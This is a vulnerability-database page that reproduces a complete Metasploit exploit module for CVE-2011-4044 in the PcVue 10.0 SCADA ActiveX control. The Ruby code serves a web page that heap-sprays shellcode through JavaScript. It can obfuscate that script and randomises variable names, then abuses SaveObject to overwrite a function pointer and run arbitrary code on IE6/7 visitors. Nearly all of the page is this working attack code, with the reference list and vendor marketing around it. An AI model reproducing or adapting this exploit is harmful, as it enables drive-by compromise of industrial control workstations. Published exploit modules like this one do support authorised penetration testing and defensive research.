Lucene search
K

PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability

🗓️ 12 Oct 2011 10:57:31Reported by Luigi Auriemma, mr_me <[email protected]>, TecR0c <[email protected] >Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 31 Views

PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability. Exploits function pointer control within SVUIGrd.ocx, allowing arbitrary code execution

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2011-4044
27 Sep 201100:00
circl
Check Point Advisories
ARC PcVue ActiveX Control SCADA Remote Code Execution (CVE-2011-4042; CVE-2011-4043 ; CVE-2011-4044; CVE-2011-4045)
12 Nov 201300:00
checkpoint_advisories
CVE
CVE-2011-4044
3 Apr 201201:00
cve
Cvelist
CVE-2011-4044
3 Apr 201201:00
cvelist
Kaspersky
KLA10292 Multiple vulnerabilities in PcVue
2 Apr 201200:00
kaspersky
NVD
CVE-2011-4044
3 Apr 201203:44
nvd
Prion
Design/Logic Flaw
3 Apr 201203:44
prion
Positive Technologies
PT-2012-1794
3 Apr 201200:00
ptsecurity
RedhatCVE
CVE-2011-4044
22 May 202505:37
redhatcve
seebug.org
Arc Informatique产品多个ActiveX控件漏洞
16 Dec 201100:00
seebug
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",
      'Description'    => %q{
        This module exploits a function pointer control within SVUIGrd.ocx of PcVue 10.0.
        By setting a dword value for the SaveObject() or LoadObject(), an attacker can
        overwrite a function pointer and execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Luigi Auriemma', # original find
          'mr_me <steventhomasseeley[at]gmail.com>',  # msf module
          'TecR0c <roccogiovannicalvi[at]gmail.com >',# msf module
        ],
      'References'     =>
        [
          [ 'CVE', '2011-4044' ],
          [ 'OSVDB', '77561' ],
          [ 'BID', '49795' ],
          [ 'URL', 'http://aluigi.altervista.org/adv/pcvue_1-adv.txt' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      'Payload'        =>
        {
          'Space'           => 1024,
          'BadChars'        => "\x00\x0a\x0d",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            #IE 6/7 on Widnows XP and Vista
            'Internet Explorer 6 / Internet Explorer 7',
            {
              'Ret'    => 0x0a0a0a0a,
              'Offset' => 1000
            }
          ]
        ],
      'DisclosureDate' => '2011-10-05',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [ false, 'The file name.',  'msf.html']),
          OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]),
        ])
  end

  def on_request_uri(cli, request)

    #If not IE, we don't continue
    agent = request.headers['User-Agent']
    if agent !~ /MSIE [6|7]\.0/
      print_error("Target not supported: #{agent.to_s}")
      send_not_found(cli)
      return
    end

    # Encode the shellcode
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Setup exploit buffers
    nops      = Rex::Text.to_unescape([target.ret].pack('V'))
    ret       = "0x%08x" % target.ret

    blocksize = 0x50000
    fillto    = 200

    # Randomize the javascript variable names
    obj_name     = rand_text_alpha(rand(100) + 1)
    j_shellcode  = rand_text_alpha(rand(100) + 1)
    j_nops       = rand_text_alpha(rand(100) + 1)
    j_ret        = rand_text_alpha(rand(100) + 1)
    j_headersize = rand_text_alpha(rand(100) + 1)
    j_slackspace = rand_text_alpha(rand(100) + 1)
    j_fillblock  = rand_text_alpha(rand(100) + 1)
    j_block      = rand_text_alpha(rand(100) + 1)
    j_memory     = rand_text_alpha(rand(100) + 1)
    j_counter    = rand_text_alpha(rand(30) + 2)
    j_txt        = rand_text_alpha(rand(8) + 4)
    randnop      = rand_text_alpha(rand(100) + 1)

    js = <<-EOS
var #{j_shellcode} = unescape('#{shellcode}');
var #{randnop} = "#{nops}";
var #{j_nops} = unescape(#{randnop});
var #{j_headersize} = 20;
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
while(#{j_nops}.length < #{j_slackspace}) {
  #{j_nops} += #{j_nops};
}
var #{j_fillblock} = #{j_nops}.substring(0, #{j_slackspace});
var #{j_block} = #{j_nops}.substring(0, #{j_nops}.length - #{j_slackspace});
while((#{j_block}.length + #{j_slackspace}) < #{blocksize}) {
  #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
}

#{j_memory} = new Array();
for(#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++){
  #{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode} ;
}

function main(){
  #{obj_name}.SaveObject("#{j_txt}.txt", #{ret}, 0);
}
EOS

    js = js.gsub(/^ {4}/, '')

    #JS obfuscation on demand
    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate(memory_sensitive: true)
      main_sym = js.sym('main')
    else
      main_sym = "main"
    end

    content = <<-EOS
<html>
<body>
<object classid='clsid:2BBD45A5-28AE-11D1-ACAC-0800170967D9' id='#{obj_name}' ></object>
<script language='javascript'>
#{js}
#{main_sym}();
</script>
</body>
</html>
EOS

    #Remove the extra tabs from content
    content = content.gsub(/^ {4}/, '')

    print_status("Sending #{self.name}")
    send_response(cli, content, {'Content-Type'=>'text/html'})
  end
end


=begin
Tested successfully on the following platforms:
 - PcVue 10.0 (SVUIGrd.ocx v1.5.1.0) on Internet Explorer 6 & 7, Windows XP SP3

Class SVUIGrdCtrl
ProgID: SV.UIGrdCtrl.1
GUID: {2BBD45A5-28AE-11D1-ACAC-0800170967D9}
Number of Interfaces: 1
Default Interface: ISVUIGrd
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
=end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation